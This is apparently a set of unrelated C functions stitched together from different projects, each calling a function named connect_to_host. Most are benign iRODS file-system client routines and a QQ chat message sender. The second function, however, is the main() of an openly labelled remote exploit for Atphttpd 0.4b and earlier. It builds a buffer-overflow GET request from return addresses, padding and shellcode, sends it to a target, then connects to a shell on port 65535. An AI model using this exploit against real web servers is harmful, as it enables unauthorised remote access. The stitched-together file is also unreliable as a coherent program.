int irods_reli_getdir( const char *host, const char *path, void (*callback) ( const char *path, void *arg ), void *arg ) { int i; int result; int keepgoing; queryHandle_t query_handle; genQueryInp_t query_in; genQueryOut_t *query_out = 0; sqlResult_t *value; /* Special case: /irods looks like an empty dir */ if(!host[0]) { callback(".",arg); callback("..",arg); return 0; } struct irods_server *server = connect_to_host(host); if(!server) return -1; /* First we set up a query for file names */ memset(&query_in,0,sizeof(query_in)); query_out = 0; rclInitQueryHandle(&query_handle,server->conn); debug(D_IRODS,"queryDataObjInColl %s %s",host,path); result = queryDataObjInColl(&query_handle,(char*)path,0,&query_in,&query_out,0); debug(D_IRODS,"= %d",result); if(result<0 && result!=CAT_NO_ROWS_FOUND) { errno = ENOTDIR; return -1; } callback(".",arg); callback("..",arg); while(result>=0) { value = getSqlResultByInx(query_out,COL_DATA_NAME); if(!value) break; char *subname = value->value; for(i=0;i<query_out->rowCnt;i++) { callback(subname,arg); subname += value->len; } keepgoing = query_out->continueInx; freeGenQueryOut(&query_out); if(keepgoing>0) { query_in.continueInx = keepgoing; debug(D_IRODS,"rcGenQuery %s",host); result = rcGenQuery(server->conn,&query_in,&query_out); debug(D_IRODS,"= %d",result); } else { break; } } /* Now we set up a SECOND query for directory names */ memset(&query_in,0,sizeof(query_in)); query_out = 0; rclInitQueryHandle(&query_handle,server->conn); debug(D_IRODS,"queryCollInColl %s %s",host,path); result = queryCollInColl(&query_handle,(char*)path,0,&query_in,&query_out); debug(D_IRODS,"= %d",result); if(result<0 && result!=CAT_NO_ROWS_FOUND) { return 0; } while(result>=0) { value = getSqlResultByInx(query_out,COL_COLL_NAME); if(!value) break; char *subname = value->value; for(i=0;i<query_out->rowCnt;i++) { callback(subname,arg); subname += value->len; } keepgoing = query_out->continueInx; freeGenQueryOut(&query_out); if(keepgoing>0) { query_in.continueInx = keepgoing; debug(D_IRODS,"rcGenQuery %s",host); result = rcGenQuery(server->conn,&query_in,&query_out); debug(D_IRODS,"= %d",result); } else { break; } } return 0; }
int main(int argc,char **argv) { int i,sd; char http_req[LEN]; unsigned long int ret=0,offset=DEFAULT_OFFSET; printf("(<->) Atphttpd <= 0.4b remote exploit by r-code [email protected]\n"); printf("(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n\n"); if(argc<2 || argc>3) { printf("[-] Usage: %s [host] <offset> #OFFset\n",argv[0]); return -1; } if(argc>2) offset=atoi(argv[2]); ret=0xbffffffa - offset; printf("<==> OFFSET: 0x%x\n",offset); printf("<==> RET_ADDR: 0x%x\n",ret); /* See comment few lines below ;] */ http_req[0x00]='G'; http_req[0x01]='E'; http_req[0x02]='T'; http_req[0x03]=' '; http_req[0x04]='/'; for(i=0x05; i<LEN;) { http_req[ALIGN + i++] = (ret & 0x000000ff); http_req[ALIGN + i++] = (ret & 0x0000ff00) >> 8; http_req[ALIGN + i++] = (ret & 0x00ff0000) >> 16; http_req[ALIGN + i++] = (ret & 0xff000000) >> 24; } for(i=0x05; i<(LEN/2); i++) http_req[i]=0x41; /* Using jump-next instruction instead of nops for a better look ;] */ for(i=0; i<strlen(shellcode); i++) http_req[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i]; http_req[LEN-0x0c]=' '; http_req[LEN-0x0b]='H'; http_req[LEN-0x0a]='T'; http_req[LEN-0x09]='T'; http_req[LEN-0x08]='P'; http_req[LEN-0x07]='/'; http_req[LEN-0x06]='1'; http_req[LEN-0x05]='.'; http_req[LEN-0x04]='1'; http_req[LEN-0x03]=0x0d; http_req[LEN-0x02]=0x0a; http_req[LEN-0x01]=0x00; /* Yeah.. I know I just could strcpy/cat it ;].. but so it looks soooooo l33t ;] aint`t it ? ;) */ printf("<==> Connecting to '%s' on port '%d'..\n",argv[1],PORT); if((sd=connect_to_host(argv[1],PORT))<0) { printf("<==> Couldn`t connect to host.. :-/\n"); exit(1); } printf("<==> Sending packets..\n"); if(send(sd,http_req,LEN,0)<0) { perror("<==> send(): while sending evil http request"); return -1; } close(sd); if((sd=connect_to_host(argv[1],65535))<0) { printf("<==> Exploit failed..! #Probably due to a bad offset\n"); return -1; } printf("\n### Exploit failed "); fflush(stdout); sleep(1); printf("... just kidding ;]\n"); sleep(1); printf("### Exploit successful - enjoy your shell\n\n"); shell(sd); return 1; }
static gint do_send_buddy_msg(QQInfo *info, QQSendMsg *msg, GError **err) { GString *uin = msg -> to_uin; gint ret_code = 0; gint res = 0; gchar params[3000]; g_debug("Send msg to %s!(%s, %d)", uin -> str, __FILE__, __LINE__); Request *req = request_new(); Response *rps = NULL; request_set_method(req, "POST"); request_set_version(req, "HTTP/1.1"); request_set_uri(req, MSGFRIPATH); request_set_default_headers(req); request_add_header(req, "Host", MSGHOST); request_add_header(req, "Cookie", info -> cookie -> str); request_add_header(req, "Origin", "http://d.web2.qq.com"); request_add_header(req, "Content-Type", "application/x-www-form-urlencoded"); request_add_header(req, "Referer" , "http://"MSGHOST"/proxy.html?v=20110331002&callback=2"); GString *content; content = qq_sendmsg_contents_tostring(msg); g_snprintf(params, 3000, "r={\"to\":%s,\"face\":%s," "%s,\"msg_id\":%s," "\"clientid\":\"%s\",\"psessionid\":\"%s\"}" , uin -> str, msg -> face -> str , content -> str , msg -> msg_id -> str , info -> clientid -> str , info -> psessionid -> str); g_string_free(content, TRUE); gchar *euri = g_uri_escape_string(params, "=", FALSE); request_append_msg(req, euri, strlen(euri)); g_free(euri); g_snprintf(params, 3000, "%u", (unsigned int)strlen(req -> msg -> str)); request_add_header(req, "Content-Length", params); Connection *con = connect_to_host(MSGHOST, 80); if(con == NULL){ g_warning("Can NOT connect to server!(%s, %d)" , __FILE__, __LINE__); request_del(req); return -1; } send_request(con, req); res = rcv_response(con, &rps); close_con(con); connection_free(con); if (-1 == res || !rps) { g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__); ret_code = -1; goto error; } const gchar *retstatus = rps -> status -> str; json_t *json = NULL; if(g_strstr_len(retstatus, -1, "200") == NULL){ /* * Maybe some error occured. */ g_warning("Resoponse status is NOT 200, but %s (%s, %d)" , retstatus, __FILE__, __LINE__); ret_code = -1; goto error; } switch(json_parse_document(&json, rps -> msg -> str)) { case JSON_OK: break; default: g_warning("json_parser_document: syntax error. (%s, %d)" , __FILE__, __LINE__); } json_t *val = json_find_first_label_all(json, "result"); if(val != NULL){ val = val -> child; if(g_strstr_len(val -> text, -1, "ok") == NULL){ g_warning("Server return error. %s (%s, %d)" , val -> text, __FILE__, __LINE__); } }else{ g_warning("Server return: (%s, %d)%s", __FILE__, __LINE__ , rps -> msg -> str); } json_free_value(&json); error: request_del(req); response_del(rps); return ret_code; }
struct irods_file * irods_reli_open ( const char *host, const char *path, int flags, int mode ) { struct irods_file *file; struct irods_server *server; dataObjInp_t request; int result; server = connect_to_host(host); if(!server) return 0; memset(&request,0,sizeof(request)); strcpy(request.objPath,path); request.openFlags = flags; debug(D_IRODS,"rcDataObjOpen %s %s",host,path); result = rcDataObjOpen (server->conn,&request); debug(D_IRODS,"= %d",result); if(result<0 && flags&O_CREAT) { memset(&request,0,sizeof(request)); strcpy(request.objPath,path); request.createMode = mode; request.openFlags = flags; request.dataSize = -1; addKeyVal (&request.condInput, DATA_TYPE_KW, "generic"); if(irods_env.rodsDefResource[0]) { addKeyVal (&request.condInput, RESC_NAME_KW,irods_env.rodsDefResource); } debug(D_IRODS,"rcDataObjCreate %s %s",host,path); result = rcDataObjCreate (server->conn,&request); debug(D_IRODS,"= %d",result); } /* An attempt to open a directory returns CAT_NO_ROWS_FOUND. For Unix compatibility, we must check for a directory by that name, and return EISDIR if it exists. */ if(result==CAT_NO_ROWS_FOUND) { struct pfs_stat info; if(irods_reli_stat(host,path,&info)>=0) { if(S_ISDIR(info.st_mode)) { errno = EISDIR; return 0; } } } if(result<0) { errno = irods_reli_errno(result); return 0; } if(flags&O_TRUNC) { irods_reli_truncate(host,path,0); } file = malloc(sizeof(*file)); file->host = strdup(host); file->path = strdup(path); file->fd = result; file->offset = 0; file->serial = server->serial; file->flags = flags; return file; }
void nopen(char * host, int port) { connect_to_host(host, port); cur_num = 0; return; }
int irods_reli_stat ( const char *host, const char *path, struct pfs_stat *info ) { int result; dataObjInp_t request; rodsObjStat_t *response = 0; /* Special case: /irods looks like an empty dir */ if(!host[0]) { memset(info,0,sizeof(*info)); info->st_ino = 2; info->st_dev = -1; info->st_mode = S_IFDIR | 0755; info->st_size = 4096; info->st_blocks = 8; info->st_nlink = 1; return 0; } struct irods_server *server = connect_to_host(host); if(!server) return -1; memset(&request,0,sizeof(request)); strcpy(request.objPath,path); debug(D_IRODS,"rcObjStat %s %s",host,path); result = rcObjStat (server->conn,&request,&response); debug(D_IRODS,"= %d",result); if(result<0) { errno = irods_reli_errno(result); return -1; } memset(info,0,sizeof(*info)); info->st_ino = hash_string(path); info->st_dev = -1; if (response->objType == COLL_OBJ_T) { info->st_mode = S_IFDIR | 0755; info->st_size = 4096; info->st_blocks = 8; info->st_ctime = atoi (response->createTime); info->st_mtime = atoi (response->modifyTime); info->st_nlink = 1; } else { info->st_mode = S_IFREG | 0755; info->st_size = response->objSize; info->st_blocks = info->st_size/512+1; info->st_nlink = 1; } info->st_blksize = 4096; info->st_ctime = atoi(response->createTime); info->st_mtime = atoi(response->modifyTime); info->st_atime = atoi(response->modifyTime); free(response); return 0; }